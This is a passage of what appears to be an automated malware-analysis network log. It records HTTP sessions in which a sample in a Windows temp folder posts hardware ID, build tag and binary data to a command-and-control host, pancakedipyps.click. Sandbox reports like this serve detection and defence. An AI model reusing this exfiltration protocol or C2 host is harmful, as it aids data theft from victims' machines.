                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1521&min_rtt=1519&rtt_var=575&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2844&recv_bytes=1041&delivery_rate=1894873&cwnd=180&unsent_bytes=0&cid=4da9ccbc87427421&ts=815&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC237INData Raw: 34 36 63 0d 0a 47 52 76 6e 79 30 66 74 4d 39 45 33 35 69 6e 68 71 37 4a 51 57 36 33 50 75 57 41 59 33 72 2b 33 31 30 71 79 49 59 56 69 55 32 46 69 4f 5a 48 70 66 64 6b 66 38 30 53 44 43 39 76 66 77 43 55 2b 67 65 33 59 42 44 72 6b 32 64 61 37 4f 64 63 4e 70 78 51 2b 51 79 4e 39 68 71 63 30 69 42 2f 7a 55 70 34 4c 32 2f 44 4a 63 6a 37 44 37 59 4e 43 66 62 54 64 31 72 73 6f 30 30 72 71 45 6a 38 43 63 58 65 41 6f 79 4b 4f 56 37 42 62 69 30 79 45 7a 74 4d 36 4e 63 53 69 30 51 30 36 38 70 33 53 72 57 69 49 41 38 67 48 4a 77 42 55 65 70 53 67 5a 5a 41 66 71 68 57 44 52 38 4f 52 6b 44 45 2b 7a 36 50 66 42 48 4f 32 31 39 2b 7a 4b 64 5a 4c 39 51 73 31 43 58 46 35 67 36 49 6f 68 30 4f 39 55 59 78 48 67 73 54 54
                                                                                                                                                                                                                                                              Data Ascii: 46cGRvny0ftM9E35inhq7JQW63PuWAY3r+310qyIYViU2FiOZHpfdkf80SDC9vfwCU+ge3YBDrk2da7OdcNpxQ+QyN9hqc0iB/zUp4L2/DJcj7D7YNCfbTd1rso00rqEj8CcXeAoyKOV7Bbi0yEztM6NcSi0Q068p3SrWiIA8gHJwBUepSgZZAfqhWDR8ORkDE+z6PfBHO219+zKdZL9Qs1CXF5g6Ioh0O9UYxHgsTT
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC902INData Raw: 63 6e 65 50 71 73 4e 43 49 76 79 4f 35 37 59 35 77 56 62 71 45 44 64 44 5a 44 65 63 36 53 4b 44 45 65 73 56 6a 45 65 4e 7a 4e 4d 39 50 73 36 74 79 51 31 36 76 39 58 64 73 53 4c 66 54 4f 67 4f 4f 77 52 7a 63 49 4b 6d 49 6f 64 58 76 46 62 45 42 63 50 4f 79 48 4a 68 6a 34 33 4c 41 58 6d 6f 30 4d 54 31 4e 35 35 61 70 77 63 39 51 79 4d 35 67 36 63 6b 67 6c 47 68 58 59 39 41 68 74 76 62 4f 7a 54 43 72 64 59 49 64 62 2f 64 30 72 38 69 33 30 6e 6a 44 54 77 46 65 33 6e 46 35 32 57 49 53 66 4d 4e 78 47 69 47 32 64 63 2b 4c 34 32 58 6d 78 30 30 70 5a 33 53 75 57 69 49 41 2b 38 46 4d 67 42 77 64 6f 61 68 4c 70 31 52 6f 56 4f 4a 54 70 48 50 31 54 77 7a 7a 4c 2f 52 44 48 79 2f 31 4e 36 38 4c 64 64 48 70 30 35 78 42 47 4d 35 33 65 6b 45 67 6c 71 2f 58 35 4e 4c 77 39 61
                                                                                                                                                                                                                                                              Data Ascii: cnePqsNCIvyO57Y5wVbqEDdDZDec6SKDEesVjEeNzNM9Ps6tyQ16v9XdsSLfTOgOOwRzcIKmIodXvFbEBcPOyHJhj43LAXmo0MT1N55apwc9QyM5g6ckglGhXY9AhtvbOzTCrdYIdb/d0r8i30njDTwFe3nF52WISfMNxGiG2dc+L42Xmx00pZ3SuWiIA+8FMgBwdoahLp1RoVOJTpHP1TwzzL/RDHy/1N68LddHp05xBGM53ekEglq/X5NLw9a
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1369INData Raw: 34 34 62 30 0d 0a 6f 39 77 55 4f 71 4f 54 7a 50 55 76 33 41 4f 2f 51 44 34 4d 64 48 47 46 71 43 47 43 56 62 4a 59 69 45 4b 41 78 64 77 36 4e 4d 4f 70 31 41 70 79 76 39 58 48 75 79 62 57 52 65 63 46 63 55 30 37 66 70 33 70 66 63 39 31 76 55 4b 51 51 4d 48 38 30 7a 77 33 79 4c 75 62 48 54 53 6c 6e 64 4b 35 61 49 67 44 36 51 30 36 44 33 78 77 68 4b 6f 6c 68 56 2b 38 58 34 78 44 67 38 54 52 4f 54 48 4a 6f 4e 41 4e 64 62 76 56 31 72 6b 74 33 55 43 6e 54 6e 45 45 59 7a 6e 64 36 51 43 42 55 71 4a 45 78 6e 36 41 78 39 34 31 4c 34 2b 79 6c 52 73 36 75 39 47 56 37 57 6a 61 52 4f 41 45 50 41 6c 34 66 59 47 6b 4b 6f 5a 59 75 6b 65 4f 52 34 33 62 33 54 67 38 77 61 48 65 44 58 71 39 33 4e 75 2f 49 35 41 4e 70 77 63 70 51 79 4d 35 71 71 51 31 6e 56 75 34 52 4d 5a 2b 67
                                                                                                                                                                                                                                                              Data Ascii: 44b0o9wUOqOTzPUv3AO/QD4MdHGFqCGCVbJYiEKAxdw6NMOp1Apyv9XHuybWRecFcU07fp3pfc91vUKQQMH80zw3yLubHTSlndK5aIgD6Q06D3xwhKolhV+8X4xDg8TROTHJoNANdbvV1rkt3UCnTnEEYznd6QCBUqJExn6Ax941L4+ylRs6u9GV7WjaROAEPAl4fYGkKoZYukeOR43b3Tg8waHeDXq93Nu/I5ANpwcpQyM5qqQ1nVu4RMZ+g
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1369INData Raw: 68 6a 34 4c 59 46 48 44 38 77 70 75 73 61 4e 64 50 70 31 68 78 43 58 64 39 68 71 55 73 67 31 79 79 55 59 4e 47 68 38 6e 57 4e 44 7a 4f 70 74 4d 4f 64 62 62 52 30 62 6b 68 31 6b 2f 6b 41 7a 64 44 4e 54 6d 43 73 57 58 58 45 5a 4a 59 6a 30 65 44 79 73 45 31 65 59 48 74 31 51 52 36 2f 49 58 44 70 54 2f 58 58 4b 6b 5a 63 51 52 33 4f 64 33 70 4c 35 31 55 76 56 47 4f 54 6f 66 46 32 6a 49 38 33 61 58 64 42 58 61 30 32 4e 71 7a 4c 64 31 45 37 41 4d 6a 45 58 68 39 69 36 56 6c 77 52 47 30 54 63 51 54 77 2b 7a 48 4d 53 6e 4a 72 70 73 64 4e 4b 57 64 30 72 6c 6f 69 41 50 6e 44 6a 30 49 66 48 4b 4f 72 53 47 50 58 4c 68 62 69 6b 4b 50 77 64 77 31 4b 38 4b 6f 30 77 68 7a 75 64 48 59 74 6a 72 54 51 71 64 4f 63 51 52 6a 4f 64 33 70 41 72 78 6d 6b 42 57 62 42 5a 71 4a 31 7a
                                                                                                                                                                                                                                                              Data Ascii: hj4LYFHD8wpusaNdPp1hxCXd9hqUsg1yyUYNGh8nWNDzOptMOdbbR0bkh1k/kAzdDNTmCsWXXEZJYj0eDysE1eYHt1QR6/IXDpT/XXKkZcQR3Od3pL51UvVGOTofF2jI83aXdBXa02NqzLd1E7AMjEXh9i6VlwRG0TcQTw+zHMSnJrpsdNKWd0rloiAPnDj0IfHKOrSGPXLhbikKPwdw1K8Ko0whzudHYtjrTQqdOcQRjOd3pArxmkBWbBZqJ1z
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1369INData Raw: 39 77 46 31 74 35 33 4b 2b 7a 47 51 52 4f 74 41 61 55 4e 38 63 59 32 6e 4a 6f 6c 61 76 31 6d 46 51 6f 58 4d 32 44 55 32 79 4b 54 63 41 6e 79 75 32 74 69 38 4b 4e 74 4b 37 51 51 77 43 44 73 33 78 61 34 39 7a 77 6e 7a 5a 34 4e 64 6b 38 71 51 4c 58 66 57 37 64 77 4f 4f 75 53 64 32 4b 63 70 31 56 48 6a 44 7a 6f 52 63 48 2b 46 72 44 65 49 58 62 6c 61 68 30 4f 4f 79 74 67 67 4f 63 4b 74 79 52 42 38 74 39 4f 56 2b 32 6a 58 57 36 64 59 63 54 4a 73 63 73 57 32 61 35 59 52 74 46 6e 45 45 38 50 4b 32 6a 38 33 33 61 6e 64 43 58 6d 79 31 64 43 39 4c 4e 70 4f 36 41 73 37 43 6e 4e 35 69 71 77 74 68 46 65 39 56 49 4a 48 6a 6f 6d 65 63 6a 37 58 37 59 4e 43 58 61 62 51 30 36 49 35 35 55 54 6e 55 58 45 63 4e 57 44 46 72 69 6e 50 43 66 4e 59 69 45 47 4f 7a 4e 51 36 50 73 79
                                                                                                                                                                                                                                                              Data Ascii: 9wF1t53K+zGQROtAaUN8cY2nJolav1mFQoXM2DU2yKTcAnyu2ti8KNtK7QQwCDs3xa49zwnzZ4Ndk8qQLXfW7dwOOuSd2Kcp1VHjDzoRcH+FrDeIXblah0OOytggOcKtyRB8t9OV+2jXW6dYcTJscsW2a5YRtFnEE8PK2j833andCXmy1dC9LNpO6As7CnN5iqwthFe9VIJHjomecj7X7YNCXabQ06I55UTnUXEcNWDFrinPCfNYiEGOzNQ6Psy
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1369INData Raw: 72 76 52 6c 65 31 6f 33 6b 37 68 41 54 41 4c 63 33 6d 44 6f 79 47 4d 57 4c 42 53 6a 55 32 49 79 74 6f 39 50 73 6d 70 32 77 6c 39 73 74 76 51 76 69 47 51 44 61 63 48 4b 55 4d 6a 4f 61 4f 4b 4e 35 31 6a 76 56 61 66 43 35 79 48 79 58 49 2b 77 2b 32 44 51 6e 47 30 30 73 65 77 49 64 68 48 37 67 41 31 43 58 5a 2b 68 61 77 6f 69 6c 57 39 55 59 4e 4c 6a 38 62 58 4f 6a 62 4c 72 64 52 43 4e 50 7a 61 7a 66 56 77 6b 47 50 73 46 68 41 4e 63 47 76 46 74 6d 75 57 45 62 52 5a 78 42 50 44 78 39 6b 7a 4d 63 47 68 30 77 5a 6f 76 4e 62 63 75 69 6e 66 51 2b 51 42 4f 77 74 70 66 34 57 69 4c 59 68 5a 74 31 75 57 53 6f 79 4a 6e 6e 49 2b 31 2b 32 44 51 6b 75 71 32 74 4b 36 61 76 6c 45 2f 41 45 37 41 48 42 31 78 62 5a 72 6c 68 47 30 57 63 51 54 77 38 54 63 50 7a 33 64 6f 64 73 43
                                                                                                                                                                                                                                                              Data Ascii: rvRle1o3k7hATALc3mDoyGMWLBSjU2Iyto9Psmp2wl9stvQviGQDacHKUMjOaOKN51jvVafC5yHyXI+w+2DQnG00sewIdhH7gA1CXZ+hawoilW9UYNLj8bXOjbLrdRCNPzazfVwkGPsFhANcGvFtmuWEbRZxBPDx9kzMcGh0wZovNbcuinfQ+QBOwtpf4WiLYhZt1uWSoyJnnI+1+2DQkuq2tK6avlE/AE7AHB1xbZrlhG0WcQTw8TcPz3dodsC
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1369INData Raw: 57 2b 4a 74 56 43 36 77 6f 32 44 57 6c 34 6a 36 55 6b 69 46 61 34 52 34 39 5a 69 4d 48 54 50 44 48 47 72 64 55 43 65 37 48 64 6c 66 74 6f 31 31 75 6e 57 48 45 6d 57 47 36 54 6f 32 65 73 52 71 56 66 67 30 65 56 77 74 45 78 4c 38 4b 39 6d 30 77 36 72 64 72 45 39 58 44 47 55 2f 41 48 4c 6b 31 69 4f 59 4b 6c 5a 64 63 52 75 46 71 4b 52 6f 6a 4e 32 54 63 78 7a 4b 6a 65 43 48 61 77 33 4e 32 38 49 74 56 47 34 51 6f 79 44 58 52 34 69 61 30 73 67 56 6a 7a 47 38 52 4d 6d 34 6d 49 63 67 2f 66 71 73 4d 50 61 76 37 76 31 71 51 35 78 55 37 33 42 6e 4d 73 65 48 57 47 72 43 4b 66 45 61 77 62 6e 51 75 45 78 5a 42 71 65 63 2b 70 31 77 46 39 73 74 4c 59 75 69 2f 62 54 4f 30 4f 49 77 78 2b 63 59 6d 68 4b 4a 31 62 75 55 65 4e 51 6f 37 48 32 43 41 36 6a 2b 4f 62 42 57 4c 38 68
                                                                                                                                                                                                                                                              Data Ascii: W+JtVC6wo2DWl4j6UkiFa4R49ZiMHTPDHGrdUCe7Hdlfto11unWHEmWG6To2esRqVfg0eVwtExL8K9m0w6rdrE9XDGU/AHLk1iOYKlZdcRuFqKRojN2TcxzKjeCHaw3N28ItVG4QoyDXR4ia0sgVjzG8RMm4mIcg/fqsMPav7v1qQ5xU73BnMseHWGrCKfEawbnQuExZBqec+p1wF9stLYui/bTO0OIwx+cYmhKJ1buUeNQo7H2CA6j+ObBWL8h
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1369INData Raw: 53 63 76 45 4e 49 51 42 2b 66 72 75 58 4b 34 68 46 74 46 75 43 53 38 4f 48 6b 44 31 35 6c 35 53 62 53 6a 71 44 6b 35 57 74 61 49 67 44 30 67 4d 2f 44 58 78 76 6c 4f 51 47 6d 45 65 35 54 73 5a 74 68 4e 6a 5a 4a 44 54 64 37 5a 56 43 66 50 79 46 68 66 74 6f 31 46 4b 6e 57 47 46 52 49 43 7a 57 2f 6e 58 64 54 76 31 4d 78 46 33 44 6b 59 4a 38 65 64 33 74 67 30 49 39 76 38 2f 48 73 79 76 47 51 4b 41 2b 44 79 4e 77 62 34 53 6b 4c 6f 4e 76 6a 55 43 48 52 59 33 4f 78 69 4e 35 67 65 33 55 51 69 4b 46 6e 5a 33 31 46 35 34 44 2f 30 42 70 51 30 35 36 69 36 63 69 6d 55 44 2b 64 59 39 64 67 73 54 62 50 6e 76 4f 6f 4d 73 46 4f 76 4b 64 30 2f 56 77 67 41 32 6e 42 43 42 44 49 79 6e 58 38 6e 44 63 42 75 4d 48 6d 77 57 61 69 63 5a 79 59 5a 33 6a 6d 78 41 36 35 4a 32 53 74 6a
                                                                                                                                                                                                                                                              Data Ascii: ScvENIQB+fruXK4hFtFuCS8OHkD15l5SbSjqDk5WtaIgD0gM/DXxvlOQGmEe5TsZthNjZJDTd7ZVCfPyFhfto1FKnWGFRICzW/nXdTv1MxF3DkYJ8ed3tg0I9v8/HsyvGQKA+DyNwb4SkLoNvjUCHRY3OxiN5ge3UQiKFnZ31F54D/0BpQ056i6cimUD+dY9dgsTbPnvOoMsFOvKd0/VwgA2nBCBDIynX8nDcBuMHmwWaicZyYZ3jmxA65J2Stj
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1369INData Raw: 45 54 49 44 63 44 6e 4c 36 53 50 50 43 65 45 62 78 45 2b 53 69 59 68 69 61 35 54 34 69 46 55 71 37 73 4b 62 72 47 6a 47 41 37 39 53 66 30 4e 70 4f 64 33 70 59 6f 78 44 6f 56 4f 48 58 59 43 4f 37 67 77 66 7a 4b 72 64 41 58 53 72 7a 4a 65 61 4b 39 74 50 36 77 63 6e 50 55 56 73 68 71 63 72 69 45 65 69 46 63 6f 4c 6a 49 6d 49 43 33 6e 65 70 39 78 4f 4d 76 44 4d 78 72 73 6a 78 6b 53 6e 50 33 39 44 59 7a 6e 64 36 52 43 4d 58 37 31 53 6b 6c 72 4f 37 39 4d 31 50 38 79 6a 7a 42 4d 36 38 70 33 54 39 58 43 43 44 61 63 45 49 45 4d 6a 4b 64 66 79 63 4e 77 47 34 77 65 62 42 5a 71 4a 78 6e 4a 68 6e 4f 4f 62 45 44 72 6b 6e 5a 4b 37 4a 64 46 41 36 51 4d 6a 45 58 31 36 6b 36 70 69 73 57 2b 57 57 49 6c 4f 6a 63 37 75 44 42 6a 46 76 64 59 4e 66 59 4c 6a 34 71 51 76 77 41 48
                                                                                                                                                                                                                                                              Data Ascii: ETIDcDnL6SPPCeEbxE+SiYhia5T4iFUq7sKbrGjGA79Sf0NpOd3pYoxDoVOHXYCO7gwfzKrdAXSrzJeaK9tP6wcnPUVshqcriEeiFcoLjImIC3nep9xOMvDMxrsjxkSnP39DYznd6RCMX71SklrO79M1P8yjzBM68p3T9XCCDacEIEMjKdfycNwG4webBZqJxnJhnOObEDrknZK7JdFA6QMjEX16k6pisW+WWIlOjc7uDBjFvdYNfYLj4qQvwAH


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              5192.168.2.449832172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:37 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=ASQVTPGAAO6
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 8741
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:37 UTC8741OUTData Raw: 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 41 53 51 56 54 50 47 41 41 4f 36 0d 0a 43 6f 6e 74 65
                                                                                                                                                                                                                                                              Data Ascii: --ASQVTPGAAO6Content-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--ASQVTPGAAO6Content-Disposition: form-data; name="pid"2--ASQVTPGAAO6Content-Disposition: form-data; name="lid"FATE99--test--ASQVTPGAAO6Conte
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC1140INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:38 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=mun0t266nkjq4fi7q1g6di7up0; expires=Wed, 16 Apr 2025 19:03:17 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=BvS9RP3Uio76E6%2Bi15umjk4wtsPDyb%2FjeoaBeFIHbLxfUF987o5aDLOZjTdpK5GgeFt%2ByQzmN0jsAIBNALB%2Be17hMb%2Bmju7Jr%2B5Fnoo3Wkb8G%2BJLrHr%2BE9E35YuZdMx%2FBN9bmq2u"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44811f2242de-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2428&min_rtt=1614&rtt_var=1187&sent=8&recv=13&lost=0&retrans=0&sent_bytes=2848&recv_bytes=9676&delivery_rate=1809169&cwnd=230&unsent_bytes=0&cid=ce2be5a4e39bfbf5&ts=921&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              6192.168.2.449837172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:40 UTC277OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=SIUJ1DQ2MO
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 20388
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:40 UTC15331OUTData Raw: 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 53 49 55 4a 31 44 51 32 4d 4f 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                                                                                                                                                                              Data Ascii: --SIUJ1DQ2MOContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--SIUJ1DQ2MOContent-Disposition: form-data; name="pid"3--SIUJ1DQ2MOContent-Disposition: form-data; name="lid"FATE99--test--SIUJ1DQ2MOContent-D
                                                                                                                                                                                                                                                              2024-12-22 01:16:40 UTC5057OUTData Raw: 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9b dc 40 f0 eb b1 64 f0 52 3c 78
                                                                                                                                                                                                                                                              Data Ascii: lrQMn 64F6(X&7~`aO@dR<x
                                                                                                                                                                                                                                                              2024-12-22 01:16:41 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:41 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: PHPSESSID=hkne23s4i9uj2hdjfjsjh236qt; expires=Wed, 16 Apr 2025 19:03:19 GMT; Max-Age=9999999; path=/
                                                                                                                                                                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                              Pragma: no-cache
                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                              cf-cache-status: DYNAMIC
                                                                                                                                                                                                                                                              vary: accept-encoding
                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4FjqClDuLEUnSX5IHRGm0kXzCWsXU14NJFwVnynUVeDwCjeWp3j4zri3zuyIpjLMqp2pQqouL2SMn0taQZRvy1YpMDO6ZTJfchMiiPSJz5OO2nRoQYwCupURNgyJA5%2BNnJLXEgql"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                              CF-RAY: 8f5c44903d1c43e7-EWR
                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=2093&min_rtt=2087&rtt_var=794&sent=15&recv=26&lost=0&retrans=0&sent_bytes=2848&recv_bytes=21345&delivery_rate=1367681&cwnd=226&unsent_bytes=0&cid=fd6212db318a40b4&ts=990&x=0"
                                                                                                                                                                                                                                                              2024-12-22 01:16:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: fok 8.46.123.189
                                                                                                                                                                                                                                                              2024-12-22 01:16:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              7192.168.2.449843172.67.209.2024437820C:\Users\user\AppData\Local\Temp\1019801001\cd2469328d.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              2024-12-22 01:16:42 UTC282OUTPOST /api HTTP/1.1
                                                                                                                                                                                                                                                              Connection: Keep-Alive
                                                                                                                                                                                                                                                              Content-Type: multipart/form-data; boundary=1DUHGOZF3UY1SZLI
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                              Content-Length: 1285
                                                                                                                                                                                                                                                              Host: pancakedipyps.click
                                                                                                                                                                                                                                                              2024-12-22 01:16:42 UTC1285OUTData Raw: 2d 2d 31 44 55 48 47 4f 5a 46 33 55 59 31 53 5a 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 31 34 31 39 35 41 35 34 30 42 43 30 42 39 38 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 31 44 55 48 47 4f 5a 46 33 55 59 31 53 5a 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 31 44 55 48 47 4f 5a 46 33 55 59 31 53 5a 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 46 41 54 45 39 39 2d 2d 74 65 73 74 0d 0a 2d 2d 31 44 55
                                                                                                                                                                                                                                                              Data Ascii: --1DUHGOZF3UY1SZLIContent-Disposition: form-data; name="hwid"F14195A540BC0B98AC8923850305D13E--1DUHGOZF3UY1SZLIContent-Disposition: form-data; name="pid"1--1DUHGOZF3UY1SZLIContent-Disposition: form-data; name="lid"FATE99--test--1DU
                                                                                                                                                                                                                                                              2024-12-22 01:16:44 UTC1125INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              Date: Sun, 22 Dec 2024 01:16:43 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
